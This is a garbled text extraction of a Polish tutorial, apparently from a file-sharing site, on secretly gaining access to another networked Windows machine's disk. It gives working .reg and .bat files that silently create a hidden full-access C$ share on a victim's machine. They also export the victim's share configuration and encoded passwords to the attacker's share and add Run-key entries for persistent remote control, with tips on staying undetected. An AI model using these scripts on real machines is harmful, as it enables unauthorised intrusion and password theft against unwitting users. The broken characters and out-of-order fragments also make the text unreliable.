Jak dostać się do dysku innego komputera w sieci wykorzystując dziury w systemie.pdf

(84 KB) Pobierz
Microsoft Word - Jak dostaæ siê do dysku innego komputera w sieci wykorzystuj¹c dziury w systemie.doc
Chyba ka dy z nas mia ju kiedy do czynienia z rejestrem systemowym. Poprzez
wpisywanie odpowiednich kluczy i warto ci mo na ca kowicie zrekonfigurowa Windowsa i
znacznie ograniczy dost p do zasobów komputera. W kluczu:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Network\LanMan\
[nazwa udost pnionego foldera lub drukarki]
zapisana jest konfiguracja wszystkich udost pnionych zasobów na naszym komputerze
(folderów i drukarek). W kluczu tym znajduj si nast puj ce zmienne :
Flags
o 101, 191 - folder udost pniony tylko do odczytu
o 103, 193 - folder udost pniony w zale no ci od podanego has a
Parm1enc, Parm2enc - zakodowane has a (maks. 8 liter)
Path - cie ka dost pu do folderu
Remark - opis
Type -
o 0 dla folderów
o 1 dla drukarek.
Tak wygl da zapis przyk adowej konfiguracji udzia u o nazwie 'instal'.
Manipuluj c tymi warto ciami atwo zmienia konfiguracje udost pnie na swoim komputerze,
ale jak wykorzystuj c rejestr systemowy aby zmieni i/lub odczyta konfiguracje innego
komputera w sieci. Bardzo prymitywnym sposobem jest podsuni cie komu w sieci zwyk ego
pliku rejestru. Np. takiego :
------in.reg------
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Network\LanMan\C$]
"Flags"=dword:00000192
"Type"=dword:00000000
"Path"="C:\\"
"Parm2enc"=hex:
dlatego zdecydowa em si j opisa .
Metoda ta jest ju troch przestarza a i atwa do wykrycia (aczkolwiek ci gle skuteczna),
Jak dosta si do dysku innego komputera w sieci
wykorzystuj c dziury w systemie ?
o 102, 192 - folder udost pniony do odczytu i zapisu
3888350.019.png 3888350.020.png 3888350.021.png 3888350.022.png 3888350.001.png 3888350.002.png 3888350.003.png 3888350.004.png 3888350.005.png
"Parm1enc"=hex:
"Remark"=""
----- - - -----
Wzór pliku in.reg mo na bardzo atwo uzyska eksportuj c z rejestru zapis dowolnego
udost pnienia. Pó niej wystarczy odpowiednio go zmodyfikowa (zmieni nazw udzia u,
cie k dost pu itd.)
Kiedy u ytkownik na innym komputerze uruchomi ten plik (domy lnie - scalaj ) wówczas
informacje zostan wprowadzone do rejestru systemowego. Po ponownym starcie systemu
na komputerze ofiary b dziemy mieli swobodny dost p do jego dysku C (znaczek '$' przy
nazwie udost pnienia oznacza, e udzia nie b dzie widoczny w Otoczeniu Sieciowym). Jak
ju wspomnia em metoda ta jest bardzo prymitywna cho by ze wzgl du na komunikat, który
pojawi si na ekranie komputera informuj cy o wprowadzeniu zmiennych do rejestru. Dlatego
powinni my zadba o to aby program regedit.exe by uruchamiany z parametrem /s - to
zapewni nam dyskrecje. Mo na to zrobi wykorzystuj c plik bat :
-----start.bat-----
regedit.exe /s \\MAX\TAJNY$\in.reg
del start.bat
----- - - -----
MAX - nazwa naszego komputera
TAJNY$ - przyk adowe udost pnienie, które musimy utworzy i do którego nale y przegra
plik in.reg
Wówczas u ytkownikowi podsuwamy tylko plik start.bat , po uruchomieniu którego
zawarto in.reg zostanie wprowadzona do rejestru. Podobnie bardzo atwo mo na
wyci gn zapis konfiguracji udost pnionych folderów z innego komputera w sieci (,takiego
który swe zasoby ma zabezpieczone has em, bo tylko wtedy ma to sens) :
-----start.bat-----
regedit.exe /s /e \\MAX\TAJNY$\out.reg
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan
del start.bat
----- - - -----
TAJNY$ - w tym przypadku musi by ustawiony jako 'pe en dost p'
Powy sze dwa sposoby daj nam mo liwo ci jednorazowej zmiany lub jednorazowego
pobrania informacji z rejestru. Ale co zrobi , eby za ka dym razem nie zmusza u ytkownika
do uruchamiania bata ? W tym celu nale y wykorzysta inny klucz w rejestrze :
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Tam w a nie zapisane s cie ki wszystkich programów, które uruchamiane s po starcie
systemu. Do tego klucza musimy wprowadzi odpowiednie zmienne, które zapewni nam
sta y dost p do rejestru systemowego innego komputera. W tym celu mo emy wykorzysta
3888350.006.png 3888350.007.png 3888350.008.png
opisan wy ej metod (pliku bat). Plik in.reg powinien wygl da nast puj co :
------in.reg------
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"WinStart"="regedit.exe /s /e \\\\MAX\\TAJNY$\\out.reg
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan"
"WinStart2"="if exist \\\\MAX\\TAJNY$\\in.reg regedit.exe /s
\\\\MAX\\TAJNY$\\out.reg"
----- - - -----
Po wprowadzeniu zawarto ci pliku in.reg do rejestru systemowego ofiary pierwsza
zmienna :
"WinStart"="regedit.exe /s /e \\\\MAX\\TAJNY$\\out.reg
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan"
sprawi, e zawsze przy starcie systemu na komputerze ofiary Windows zapisze ca
konfiguracje udost pnionych folderów i drukarek w pliku out.reg na naszym dysku. Je eli w
tym czasie udzia \\MAX\TAJNY$ nie b dzie dost pny (np. je eli nasz komputer b dzie
wy czony) wówczas start systemu opó ni si o oko o 1 sekund . Zapis drugiej zmiennej jest
troch bardziej skomplikowany :
"WinStart2"="if exist \\\\MAX\\TAJNY$\\in.reg regedit.exe /s
\\\\MAX\\TAJNY$\\in.reg"
Podobnie jak w przypadku pierwszej zmiennej zawsze, gdy system b dzie adowany zostanie
uruchomiony program regedit.exe i wprowadzi do rejestru systemowego ofiary zmienne
znajduj ce si w pliku in.reg na naszym dysku. Jednak e tutaj jest to troch bardziej
skomplikowane. Gdy program nie znalaz by pliku in.reg (np. gdy b dziemy mieli wy czony
komputer) na ekranie komputera ofiary pojawi by si komunikat o b dzie. Aby tego unikn
przed uruchomieniem regedit.exe konieczne jest sprawdzenie czy istnieje taki plik.
Dlatego warto zmiennej ma posta :
if exist nazwapliku polecenie
a u ytkownik w sieci w czy komputer,
b d zrestartuje system. Wówczas tak e b dziemy mogli odczyta zapis konfiguracji
udost pnionych folderów, a co za tym idzie - has a, które po starcie systemu znajd si w
pliku out.reg , na naszym dysku. Trzeba jednak pami ta o tym, e istnieje program
"Monitor sieci", który pokazuje wszystkie komputery w sieci pod czone do zasobów
okre lonego kompa.
Teraz, gdy tylko b dziemy chcieli wprowadzi jakie zmiany w konfiguracji udost pnionych
folderów w komputerze ofiary wystarczy przygotowa odpowiedni plik in.reg , przegra go
do folderu, który udost pniamy - TAJNY$ i poczeka ,
3888350.009.png 3888350.010.png 3888350.011.png 3888350.012.png 3888350.013.png 3888350.014.png 3888350.015.png 3888350.016.png 3888350.017.png 3888350.018.png
Zgłoś jeśli naruszono regulamin